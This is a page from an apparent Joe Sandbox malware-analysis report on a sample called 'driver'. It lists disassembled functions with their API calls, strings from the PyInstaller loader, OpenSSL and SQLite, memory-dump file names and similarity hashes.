Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FF8A8660B57

Strings

:, xrefs: 00007FF8A8660AAC
%s%c%s, xrefs: 00007FF8A8660AB6
:, xrefs: 00007FF8A8660A71
winFullPathname1, xrefs: 00007FF8A8660B3C
\, xrefs: 00007FF8A8660AC8
?, xrefs: 00007FF8A8660A81
winFullPathname2, xrefs: 00007FF8A8660BC5

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction ID: c058126bb74c8214dbb4550c49bf02d91bd1d977563796deeee770a6555cd749
Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction Fuzzy Hash: E6510621E0E2C375FB189F61A4196BA6B91EF44BC8F486036DE4F17682CF3CE4458769

Function 00007FF6A29B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6A29B11FD
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6A29B1108
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B10CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B11F6
malloc, xrefs: 00007FF6A29B110F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B1098
fseek, xrefs: 00007FF6A29B10D3

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 93a99ecdf3e8fc99c1b36ca47dd141200c48205025082e9433e3032b91ac76d9
Instruction ID: 30ea5a6e5b2fe94dc229a738652b5487460b866e9d55a4276c9e9f7d089418d8
Opcode Fuzzy Hash: 93a99ecdf3e8fc99c1b36ca47dd141200c48205025082e9433e3032b91ac76d9
Instruction Fuzzy Hash: 5B416822B8A65286FA10DB13A8556BA6395FF44FC8F844432ED4C87797DFBCE502A740

Function 00007FF6A29B8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B893C

Part of subcall function 00007FF6A29B8A20: GetEnvironmentVariableW.KERNEL32(00007FF6A29B388E), ref: 00007FF6A29B8A57
Part of subcall function 00007FF6A29B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6A29B8A79

Part of subcall function 00007FF6A29C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C82C1

Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF6A29B88CC
TMP, xrefs: 00007FF6A29B88B2
_MEI%d, xrefs: 00007FF6A29B8902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6A29B896E
TMP, xrefs: 00007FF6A29B888C, 00007FF6A29B8993

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: 373c8950d62d497dac01f4c9953196defd2f6d09158d483b887f0ea2bbc31112
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: BA41A012B9B64245FE11AB67A9552FA1291BF8DFC8F400031ED0DC779BDEBCE501A301

Function 00007FF8A8662CF0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86630AA

Strings

API called with finalized prepared statement, xrefs: 00007FF8A8662E6C, 00007FF8A8662EE8
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8662D63, 00007FF8A8662EF9
API called with NULL prepared statement, xrefs: 00007FF8A8662E54
%s at line %d of [%.10s], xrefs: 00007FF8A8662EA5, 00007FF8A8662F12
ATTACH x AS %Q, xrefs: 00007FF8A8662D80
misuse, xrefs: 00007FF8A8662E99, 00007FF8A8662F06

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 22509725-1404302391
Opcode ID: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
Instruction ID: edd0319f246ad86d95035925b10c66cad0f45109161fcdac06dec21df21e5875
Opcode Fuzzy Hash: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
Instruction Fuzzy Hash: 54F18D21A0BB82A6FB689B65A55837973A5FF40BC0F146135CA4F47795CF3CE4858328

Function 00007FF8A8057250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A80573CA
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A80575E9
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8057623

Strings

STRENGTH, xrefs: 00007FF8A80575DF
SECLEVEL=, xrefs: 00007FF8A8057619
..\s\ssl\ssl_ciph.c, xrefs: 00007FF8A8057667, 00007FF8A80576E9
ssl_cipher_process_rulestr, xrefs: 00007FF8A8057660, 00007FF8A80576DD

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
API String ID: 800424832-331183818
Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction ID: 4c24977f90ddaa6abbfa7dc4f1749abcbf87d552b2c4b4070ed59041320595c6
Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction Fuzzy Hash: F0D1D372A0E28256EF688A19D1403796ED0FB457D0F14E035EE8D976D4DF3CE861AB38

Function 00007FF6A29BEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6A29BEAD5

Part of subcall function 00007FF6A29BFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6A29BFA6F
Part of subcall function 00007FF6A29BFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6A29BFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6A29BEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6A29BEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6A29BEF08

Strings

csm, xrefs: 00007FF6A29BEB56
csm, xrefs: 00007FF6A29BEBD0
csm, xrefs: 00007FF6A29BEAEF

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 898370ea11ac07150cb2a6f53b1968cbe6bdf08a93cbc2c7450484af30ae40a9
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 35D17C32A497418AEB20DB66D4453AD37A4FB45B8CF500136EE8D97B9BDFB8E490D700

Function 00007FF8A8042536 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214COMMON

Download Yara Rule

APIs

00007FF8C61A3420.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF8A8051BA1
GetLastError.KERNEL32 ref: 00007FF8A8051D06

Strings

%s/%s, xrefs: 00007FF8A8051B81
SSL_add_file_cert_subjects_to_stack, xrefs: 00007FF8A8051D65
..\s\ssl\ssl_cert.c, xrefs: 00007FF8A8051CFA, 00007FF8A8051D33, 00007FF8A8051D71, 00007FF8A8051DBF
SSL_add_dir_cert_subjects_to_stack, xrefs: 00007FF8A8051CEE, 00007FF8A8051D27, 00007FF8A8051DB3
calling OPENSSL_dir_read(%s), xrefs: 00007FF8A8051D0F

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007A3420ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
API String ID: 3659664395-502574948
Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction ID: 34247578805ba1254ea9005590f55a09cddfc197b22d121f29cf5252778762b4
Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
Instruction Fuzzy Hash: C191A461A0E68265FF54AB11A4153BAA751EF94BC4F445031EE8E0BBD6DF3CE4218B3C

Function 00007FF6A29CED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,000001C0EBD18F78,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,000001C0EBD18F78,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEF08

Strings

api-ms-, xrefs: 00007FF6A29CEE46
ext-ms-, xrefs: 00007FF6A29CEE59

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: e8aba44b315e9c6144e1426126274685ff4973418fb03f16126bd091c7a368a6
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 66412361B9AA0245FA15CB1798106752291BF49FD8F884139ED5EC778AEEBCF804A300

Function 00007FF6A29B2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
MessageBoxW.USER32 ref: 00007FF6A29B2D99

Strings

Error, xrefs: 00007FF6A29B2D8C
%ls: , xrefs: 00007FF6A29B2D22
<FormatMessageW failed.>, xrefs: 00007FF6A29B2D70
[PYI-%d:ERROR] , xrefs: 00007FF6A29B2CA6

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: b03ee444e7dfb5ca23af1030333177d7dc886f056d7cf53708ae0acf53684745
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: C031C322B49B4142E620AB26A8542AB6695BF88FDDF400136EF4DD375ADF7CD506D300

Function 00007FF8A8041497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8A80992A3
HMAC, xrefs: 00007FF8A809928B
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A8098F9B, 00007FF8A80991CA, 00007FF8A8099353, 00007FF8A80993D4, 00007FF8A8099444
SHA2-256, xrefs: 00007FF8A80992D7
tls_construct_stoc_cookie, xrefs: 00007FF8A8098F8F, 00007FF8A80991BE, 00007FF8A809934C, 00007FF8A80993C8, 00007FF8A809943D

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction ID: 4d9e43d53d9f6bac4d3e2eb89621123a7a446dc6f6e38435d5819cfe60672ef4
Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction Fuzzy Hash: 26D15A62B4EA43A5FF10AA6295527BD22A1EF45BC4F844031DD4E4BBC6DF3CE4218738

Function 00007FF8A80426E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

SSL_CTX_use_serverinfo_file, xrefs: 00007FF8A806A521, 00007FF8A806A562, 00007FF8A806A626, 00007FF8A806A79C, 00007FF8A806A7D2, 00007FF8A806A7FB, 00007FF8A806A826, 00007FF8A806A84A
SERVERINFOV2 FOR , xrefs: 00007FF8A806A650
..\s\ssl\ssl_rsa.c, xrefs: 00007FF8A806A52D, 00007FF8A806A56E, 00007FF8A806A62D, 00007FF8A806A69B, 00007FF8A806A6F6, 00007FF8A806A70F, 00007FF8A806A729, 00007FF8A806A7A8, 00007FF8A806A7DE, 00007FF8A806A802, 00007FF8A806A832, 00007FF8A806A856, 00007FF8A806A878, 00007FF8A806A88E, 00007FF8A806A8A4, 00007FF8A806A8BA
SERVERINFO FOR , xrefs: 00007FF8A806A5E6

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction ID: 7a3af74d2f64711c66feb0c8660a370b6075fedec3f3cf47efbd45faf3adc4d8
Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction Fuzzy Hash: 5DB15C61B0A682A9FF10EB51D8412BD67A5EF847C4F408032DD0D4BAD6DF7CE6258B78

Function 00007FF6A29BDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDBD
GetLastError.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE63
GetProcAddress.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE6F

Strings

api-ms-, xrefs: 00007FF6A29BDDDD

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 6fb9187e514338b17109fd4e8eeedf04451747e1992d089788ffda96768a1d8c
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 3131C225B4BA0281EE129B03A81057523D4FF58FA8F494535DD1D8B787EFBCE444A324

Function 00007FF6A29B2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6A29B351A,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B2AA0

Strings

Warning, xrefs: 00007FF6A29B2B1E
Warning [ANSI Fallback], xrefs: 00007FF6A29B2B0F
[PYI-%d:%s] , xrefs: 00007FF6A29B2AA8
0, xrefs: 00007FF6A29B2B16
WARNING, xrefs: 00007FF6A29B2AAF

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 1830cea742d7ff759bdc423e423cafd9551ad5159999ef12c03b485e4b678c7b
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 8E21A332A5A78182E6209B62F4417E66394FB88BC8F400136EE8C9365ADFBCD5459700

Function 00007FF6A29B8760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

